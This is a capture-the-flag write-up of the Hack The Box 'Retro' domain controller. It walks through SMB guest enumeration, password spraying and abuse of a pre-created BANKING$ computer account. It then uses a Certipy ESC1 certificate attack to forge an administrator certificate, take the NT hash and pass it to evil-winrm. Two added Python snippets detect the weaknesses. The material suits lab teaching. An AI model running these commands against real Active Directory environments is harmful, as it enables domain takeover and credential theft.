Retro
Retro is an easy-rated entry-level box. The initial hint, Important.txt, is obtained through an SMB null session.
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nmap 10.129.14.207 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-08 09:49 EST
Nmap scan report for 10.129.14.207
Host is up (0.20s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
58107/tcp open unknown
58411/tcp open unknown
62569/tcp open unknown
62577/tcp open unknown
62585/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 49.43 seconds
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nmap 10.129.14.207 -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-08 09:51 EST
Nmap scan report for 10.129.14.207
Host is up (0.084s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-08 14:51:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-08T14:53:18+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-12-08T14:53:17+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-12-08T14:53:18+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-12-08T14:53:17+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-12-07T14:28:20
|_Not valid after: 2026-06-08T14:28:20
|_ssl-date: 2025-12-08T14:53:17+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-12-08T14:52:38+00:00
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-12-08T14:52:39
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.06 seconds
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u '' -p '' --generate-hosts-file hosts
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\:
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat hosts
10.129.14.207 DC.retro.vl retro.vl DC
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] krb5 conf saved to: /etc/krb5.conf
SMB 10.129.14.207 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 10.129.14.207 445 DC [+] retro.vl\:
1.2. SMB null session
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u 'g1uest' -p '' --shares
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\g1uest: (Guest)
SMB 10.129.14.207 445 DC [*] Enumerated shares
SMB 10.129.14.207 445 DC Share Permissions Remark
SMB 10.129.14.207 445 DC ----- ----------- ------
SMB 10.129.14.207 445 DC ADMIN$ Remote Admin
SMB 10.129.14.207 445 DC C$ Default share
SMB 10.129.14.207 445 DC IPC$ READ Remote IPC
SMB 10.129.14.207 445 DC NETLOGON Logon server share
SMB 10.129.14.207 445 DC Notes
SMB 10.129.14.207 445 DC SYSVOL Logon server share
SMB 10.129.14.207 445 DC Trainees READ
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# impacket-smbclient guest@10.129.14.207
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Notes
SYSVOL
Trainees
# use Trainees
# ls
drw-rw-rw- 0 Sun Jul 23 18:16:11 2023 .
drw-rw-rw- 0 Wed Jun 11 10:17:10 2025 ..
-rw-rw-rw- 288 Sun Jul 23 18:16:11 2023 Important.txt
# get Important.txt
# exit
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# ls
hosts Important.txt labs_C1trus33.ovpn note ports
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
1.3. RID enumeration
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u 'guest' -p '' --rid-brute
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\guest:
SMB 10.129.14.207 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.14.207 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.14.207 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.14.207 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.14.207 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.14.207 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.14.207 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.14.207 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.14.207 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.14.207 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.14.207 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.14.207 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.14.207 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.14.207 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.14.207 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.14.207 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.14.207 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.14.207 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.14.207 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.14.207 445 DC 1109: RETRO\tblack (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat rids |grep SidTypeUser|awk '{print $6}'|cut -d '\' -f2
Administrator
Guest
krbtgt
DC$
trainee
BANKING$
jburley
tblack
1.4. Password spraying
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u valid_users.txt -p valid_users.txt --no-bruteforce --continue-on-success
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [-] retro.vl\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\Guest:Guest STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\DC$:DC$ STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.14.207 445 DC [-] retro.vl\BANKING$:BANKING$ STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\jburley:jburley STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\tblack:tblack STATUS_LOGON_FAILURE
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u trainee -p trainee --shares
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.14.207 445 DC [*] Enumerated shares
SMB 10.129.14.207 445 DC Share Permissions Remark
SMB 10.129.14.207 445 DC ----- ----------- ------
SMB 10.129.14.207 445 DC ADMIN$ Remote Admin
SMB 10.129.14.207 445 DC C$ Default share
SMB 10.129.14.207 445 DC IPC$ READ Remote IPC
SMB 10.129.14.207 445 DC NETLOGON READ Logon server share
>>>> SMB 10.129.14.207 445 DC Notes READ
SMB 10.129.14.207 445 DC SYSVOL READ Logon server share
SMB 10.129.14.207 445 DC Trainees READ
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# impacket-smbclient trainee:trainee@10.129.14.207
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Notes
# ls
drw-rw-rw- 0 Tue Apr 8 23:12:49 2025 .
drw-rw-rw- 0 Wed Jun 11 10:17:10 2025 ..
-rw-rw-rw- 248 Sun Jul 23 18:05:56 2023 ToDo.txt
-rw-rw-rw- 32 Tue Apr 8 23:13:01 2025 user.txt
# get user.txt
# get ToDo.txt
# exit
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat user.txt
cbda362cff20**********
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
2. System
2.1. Bloodhound
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# bloodhound-ce-python -c All -u trainee -p trainee -d retro.vl -ns 10.129.14.207 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: retro.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Testing resolved hostname connectivity dead:beef::82ba:6225:ae6e:f1
INFO: Trying LDAP connection to dead:beef::82ba:6225:ae6e:f1
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Testing resolved hostname connectivity dead:beef::82ba:6225:ae6e:f1
INFO: Trying LDAP connection to dead:beef::82ba:6225:ae6e:f1
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: DC.retro.vl
INFO: Done in 00M 21S
INFO: Compressing output into 20251208111430_bloodhound.zip
2.2. Pre-Windows 2000 computers
Anyone who plays HTB regularly knows that for computer accounts pre-created as "pre-Windows 2000 computers", the default password is the lowercase SAM account name (the computer name without the trailing $).
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u BANKING$ -p banking
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
No password change is needed at this point; authenticating over Kerberos instead of NTLM is enough.
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u BANKING$ -p banking -k
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\BANKING$:banking
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u BANKING$ -p banking -k --generate-tgt banking
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\BANKING$:banking
SMB 10.129.14.207 445 DC [+] TGT saved to: banking.ccache
SMB 10.129.14.207 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=banking.ccache
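The check behind the point above, as an added example that is not part of the original write-up: decode userAccountControl and flag computer accounts that still carry the pre-created pattern (PASSWD_NOTREQD together with WORKSTATION_TRUST_ACCOUNT, i.e. the value 4128). The flag values are Microsoft's documented userAccountControl bits; the LDAP records are constructed to mirror the objects seen on this box.

```python
# Added example: detect pre-created ("pre-Windows 2000") computer accounts in an
# LDAP export. A pre-created account keeps PASSWD_NOTREQD (0x20) next to
# WORKSTATION_TRUST_ACCOUNT (0x1000) until a machine actually joins with it, so
# userAccountControl == 4128 is the classic indicator that the default password
# (lowercase computer name) is probably still in place. Heuristic, not proof.
#
# Live-directory equivalent of find_precreated() (bitwise-AND matching rule):
#   (&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=32))

# userAccountControl bits (subset; values from the Microsoft documentation)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000


def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def is_precreated_computer(account: dict) -> bool:
    """True when the object is a workstation/member-server trust account that
    still has PASSWD_NOTREQD set, i.e. it was pre-created and never joined."""
    uac = int(account["userAccountControl"])
    if not uac & WORKSTATION_TRUST_ACCOUNT:
        return False  # DC$ (SERVER_TRUST_ACCOUNT) and user objects are out of scope
    return bool(uac & PASSWD_NOTREQD)


def find_precreated(accounts: list[dict]) -> list[str]:
    """sAMAccountNames of the accounts that match the pre-created pattern."""
    return sorted(a["sAMAccountName"] for a in accounts if is_precreated_computer(a))


# Constructed sample export; values chosen to mirror the objects on this box
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$",      "userAccountControl": 532480},  # 0x2000|0x80000: domain controller
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128},    # 0x1000|0x0020: pre-created, default password
    {"sAMAccountName": "WS01$",    "userAccountControl": 4096},    # 0x1000 only: normally joined workstation
]

if __name__ == "__main__":
    for acct in SAMPLE_COMPUTERS:
        print(f'{acct["sAMAccountName"]:10} {decode_uac(acct["userAccountControl"])}')
    print("pre-created candidates:", find_precreated(SAMPLE_COMPUTERS))
```

The NTLM failure STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT shown above is itself a signal worth alerting on: it is the DC refusing an NTLM logon for a trust account that has never been used, and a burst of them from a non-domain host deserves a look.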
2.3. AD CS
The group Certificate Service DCOM Access exists, so AD CS is very likely deployed in the domain.
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc ldap 10.129.14.207 -u BANKING$ -p banking -k -M adcs
LDAP 10.129.14.207 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP 10.129.14.207 389 DC [+] retro.vl\BANKING$:banking
ADCS 10.129.14.207 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.14.207 389 DC Found PKI Enrollment Server: DC.retro.vl
ADCS 10.129.14.207 389 DC Found CN: retro-DC-CA
This confirms a PKI enrollment server on DC.retro.vl and a certificate authority named retro-DC-CA.
Note: Finding Weak AD Computer Passwords | by Giulio Pierantoni | Medium
The machine account's default password has to be changed first. That default is the initial value set when the computer account was pre-created, and an account still using it is not trusted by the domain for a normal logon.
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# impacket-changepasswd 'retro.vl/BANKING$:banking@10.129.14.207' -newpass 'Admin123' -dc-ip 10.129.14.207 -p rpc-samr
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
Then use Certipy to look for exploitable AD CS misconfigurations.
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy find -u 'banking$@DC.retro.vl' -p 'Admin123' -dc-ip '10.129.14.207' -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
>>>> Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
The RetroClients template is vulnerable to ESC1, and domain computer accounts are allowed to enroll in it.
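The ESC1 preconditions that Certipy reports, evaluated in code as an added example (mine, not Certipy's or the write-up's): a template dict constructed from the RetroClients output above is checked against each condition, and one remediation is shown to clear the finding. The dict keys are my own simplification of Certipy's labels, not Certipy's data model.

```python
# Added example: decide whether a certificate template meets every ESC1
# precondition, and show which single attribute change removes the finding.
# The template below is constructed from the Certipy output for 'RetroClients'.

# Principals whose enroll right makes a template reachable for any domain member
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}

# EKUs that let the issued certificate authenticate as the principal it names
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}


def esc1_unmet(template: dict) -> list[str]:
    """Return the ESC1 preconditions this template does NOT satisfy.
    An empty list means every condition holds, i.e. a low-privileged enrollee
    can request a certificate for an arbitrary UPN/SID and log on with it."""
    enrollers = {p.split("\\")[-1] for p in template["enrollment_rights"]}
    conditions = {
        "published and enabled on a CA":
            template["enabled"] and bool(template["certificate_authorities"]),
        "enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)":
            "EnrolleeSuppliesSubject" in template["certificate_name_flags"],
        "EKU allows authentication":
            not template["extended_key_usage"]  # no EKU at all behaves like Any Purpose
            or bool(AUTH_EKUS & set(template["extended_key_usage"])),
        "no manager approval required":
            not template["requires_manager_approval"],
        "no authorized signatures required":
            template["authorized_signatures_required"] == 0,
        "low-privileged principal holds Enroll":
            bool(LOW_PRIV_PRINCIPALS & enrollers),
    }
    return [name for name, ok in conditions.items() if not ok]


def is_esc1(template: dict) -> bool:
    return not esc1_unmet(template)


def harden(template: dict) -> dict:
    """One remediation: drop EnrolleeSuppliesSubject so the CA builds the
    subject from the requester's AD object instead of trusting the CSR.
    Requiring manager approval or removing Domain Computers' Enroll right
    would each break the chain as well."""
    fixed = dict(template)
    fixed["certificate_name_flags"] = [
        f for f in template["certificate_name_flags"] if f != "EnrolleeSuppliesSubject"]
    return fixed


# Constructed from the 'RetroClients' block in the Certipy output above
RETRO_CLIENTS = {
    "name": "RetroClients",
    "enabled": True,
    "certificate_authorities": ["retro-DC-CA"],
    "certificate_name_flags": ["EnrolleeSuppliesSubject"],
    "extended_key_usage": ["Client Authentication"],
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": ["RETRO.VL\\Domain Admins", "RETRO.VL\\Domain Computers",
                          "RETRO.VL\\Enterprise Admins"],
}

if __name__ == "__main__":
    print("RetroClients ESC1:", is_esc1(RETRO_CLIENTS))
    print("after hardening  :", is_esc1(harden(RETRO_CLIENTS)), esc1_unmet(harden(RETRO_CLIENTS)))
```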
2.4. ESC1
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy req \
-u 'banking$@DC.retro.vl' -p 'Admin123' \
-dc-ip '10.129.14.207' -target 'DC.retro.vl' \
-ca 'retro-DC-CA' -template 'RetroClients' \
-upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 12
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
The error says the public key does not meet the minimum size required by the certificate template.
Certipy requests a 2048-bit key by default; looking at the template details again, the minimum RSA key length is 4096, so we retry with the key size set to 4096.
The request then had to be sent twice: the first attempt timed out and only the second one succeeded.
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy req \
-u 'banking$@DC.retro.vl' -p 'Admin123' \
-dc-ip '10.129.14.229' -target 'DC.retro.vl' \
-ca 'retro-DC-CA' -template 'RetroClients' \
-upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500' -key-size 4096
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy req \
-u 'banking$@DC.retro.vl' -p 'Admin123' \
-dc-ip '10.129.14.229' -target 'DC.retro.vl' \
-ca 'retro-DC-CA' -template 'RetroClients' \
-upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500' -key-size 4096
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Then use this certificate to request a TGT and retrieve the NT hash.
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.14.229
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# evil-winrm -i 10.129.14.207 -u administrator -H 252fac7066d93dd009d4fd2cd0368389
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
40fce9c3f09024bcab29*********